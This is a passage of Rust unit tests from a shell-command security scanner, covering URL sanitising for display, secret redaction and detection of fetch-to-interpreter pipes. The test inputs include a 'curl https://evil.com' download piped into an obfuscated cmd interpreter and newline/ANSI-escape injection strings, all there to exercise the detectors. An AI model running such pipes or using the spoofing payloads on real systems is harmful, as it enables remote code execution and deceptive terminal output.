3133        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
3134        assert_eq!(findings.len(), 1);
3135        // The \n must be stripped — "FAKE" collapses onto the URL, not a separate line
3136        let hint_line = findings[0]
3137            .description
3138            .lines()
3139            .find(|l| l.contains("Safer:"))
3140            .expect("should have hint line");
3141        assert!(
3142            hint_line.contains("example.com/FAKE"),
3143            "newline stripped, FAKE should be part of the URL on the hint line: {hint_line}"
3144        );
3145        // Verify no line starts with "FAKE" (would indicate injection)
3146        assert!(
3147            !findings[0]
3148                .description
3149                .lines()
3150                .any(|l| l.starts_with("FAKE")),
3151            "newline injection must not create a spoofed output line: {}",
3152            findings[0].description
3153        );
3154    }
3155
3156    #[test]
3157    fn test_sanitize_url_for_display() {
3158        assert_eq!(
3159            sanitize_url_for_display("https://ok.com/path"),
3160            "https://ok.com/path"
3161        );
3162        assert_eq!(
3163            sanitize_url_for_display("https://evil.com/\x1b[31mred\x1b[0m"),
3164            "https://evil.com/[31mred[0m"
3165        );
3166        assert_eq!(
3167            sanitize_url_for_display("https://evil.com/\n\rspoof"),
3168            "https://evil.com/spoof"
3169        );
3170        assert_eq!(
3171            sanitize_url_for_display("https://evil.com/\x07bell\x00null"),
3172            "https://evil.com/bellnull"
3173        );
3174    }
3175
3176    #[test]
3177    fn test_pipe_to_interpreter_cmd_quoted_caret_cmd() {
3178        let findings = check_default("curl https://evil.com | \"c^md\" /c dir", ShellType::Cmd);
3179        assert!(
3180            findings
3181                .iter()
3182                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
3183            "quoted cmd caret escapes should still detect the interpreter pipe"
3184        );
3185    }
3186
3187    #[test]
3188    fn test_redact_env_value_never_returns_secret() {
3189        assert_eq!(redact_env_value(""), "");
3190        assert_eq!(redact_env_value("sk-abc123"), "[REDACTED]");
3191        assert_eq!(redact_env_value("ABCDEFGHIJKLMNOPQRSTUVWX"), "[REDACTED]");
3192    }
3193
3194    #[test]
3195    fn test_source_command_arrays_consistent() {
3196        // is_source_command is composed from the three const arrays.
3197        // Verify all arrays contribute and is_source_command rejects unknowns.
3198        for cmd in POSIX_FETCH_COMMANDS {
3199            assert!(
3200                is_source_command(cmd),
3201                "POSIX_FETCH entry '{cmd}' not recognized"
3202            );
3203            assert!(
3204                is_url_fetch_command(cmd),
3205                "POSIX_FETCH entry '{cmd}' not in fetch union"
3206            );
3207        }
3208        for cmd in POWERSHELL_FETCH_COMMANDS {
3209            assert!(
3210                is_source_command(cmd),
3211                "PS_FETCH entry '{cmd}' not recognized"
3212            );
3213            assert!(
3214                is_url_fetch_command(cmd),
3215                "PS_FETCH entry '{cmd}' not in fetch union"
3216            );
3217        }
3218        for cmd in NON_FETCH_SOURCE_COMMANDS {
3219            assert!(
3220                is_source_command(cmd),
3221                "NON_FETCH entry '{cmd}' not recognized"
3222            );
3223            assert!(
3224                !is_url_fetch_command(cmd),
3225                "NON_FETCH entry '{cmd}' should not be in fetch union"
3226            );
3227        }
3228        assert!(
3229            !is_source_command("cat"),
3230            "cat should not be a source command"
3231        );
3232    }
3233}
tirith_core/rules/command.rs

tirith_core/rules/
command.rs